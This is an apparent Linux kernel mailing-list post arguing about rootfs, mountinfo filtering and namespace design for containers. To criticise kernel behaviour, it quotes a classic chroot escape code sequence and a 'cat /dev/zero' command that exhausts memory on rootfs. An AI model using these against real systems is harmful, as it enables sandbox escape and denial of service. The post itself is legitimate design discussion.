On 10/08/14 14:23, Eric W. Biederman wrote: >> Could we have an extra rootfs-like fs that is always completely empty, >> doesn't allow any writes, and can sit at the bottom of container >> namespace hierarchies? If so, and if we add a new syscall that's like >> pivot_root (or unshare) but prunes the hierarchy, then we could switch >> to that rootfs then. > > Or equally have something that guarantees that rootfs is empty and > read-only at the time the normal root filesystem is mounted. That is > certainly a much more localized change if we want to go there. What do you mean "normal" root filesystem? It is entirely possible (and in fact common in the embedded world) to run from rootfs. I pushed my old inittmpfs patches (at the request of cray) last year because being able to take down the system with "cat /dev/zero > /blah" (as rootfs allows and tmpfs doesn't) is a bad thing. Rootfs is about as special as PID 1 is. We don't filter out PID 1 from "ps" to avoid confusing people, but for some reason whoever did /proc/$PID/mountinfo decided that rootfs shouldn't show up because magic magic specialness. We show /run, which is a tmpfs instance. If I mount two different filesystems on top of each other on /mnt, it shows both. (Overmounts were not invented by rootfs.) But no, mountinfo filters out rootfs because magic magic specialness. It makes me sad that this kind of special-case thinking is allowed in the kernel. > I am half tempted to suggest that mount --move /some/path / be updated > to make the old / just go away (perhaps to be replaced with a read-only > empty rootfs). That gets us into figuring out if we break userspace > which is a big challenge. My concern was that chroot() moving a magic "/" pointer that you can trivially escape from with x=open("."); chroot("sub"); fdchdir("."); chdir("../../../../../../../../.."); is having extra code in the kernel to do it _wrong_. We have per-process namespaces now. We can actually adjust the mount tree (inserting a new bind mount if the directory we're changing to is not already a mount point). If a per-process namespace needs to be anchored by a tmpfs, fine. But requiring that to be teh SAME instance globally for the entire system is not what containers is _about_. It's not true for PID 1 and it shouldn't be true for rootfs. By all means, if a filesystem is no longer accessable in a namespace, decrement its reference count. (Keeping in mind that a bind mount should count as a reference, and rootfs should always have a nonzero reference count.) But "/" is not special in this regard. If you want to make all overmounts vanish (which seems like a really bad idea and breaks 40 years of unix semantics), argue for that. Please stop treating rootfs like it isn't potentialy usable as a full-fledged filesystem. (Pet peeve of mine.) > Eric Rob -- To unsubscribe from this list: send the line "unsubscribe linux-api" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html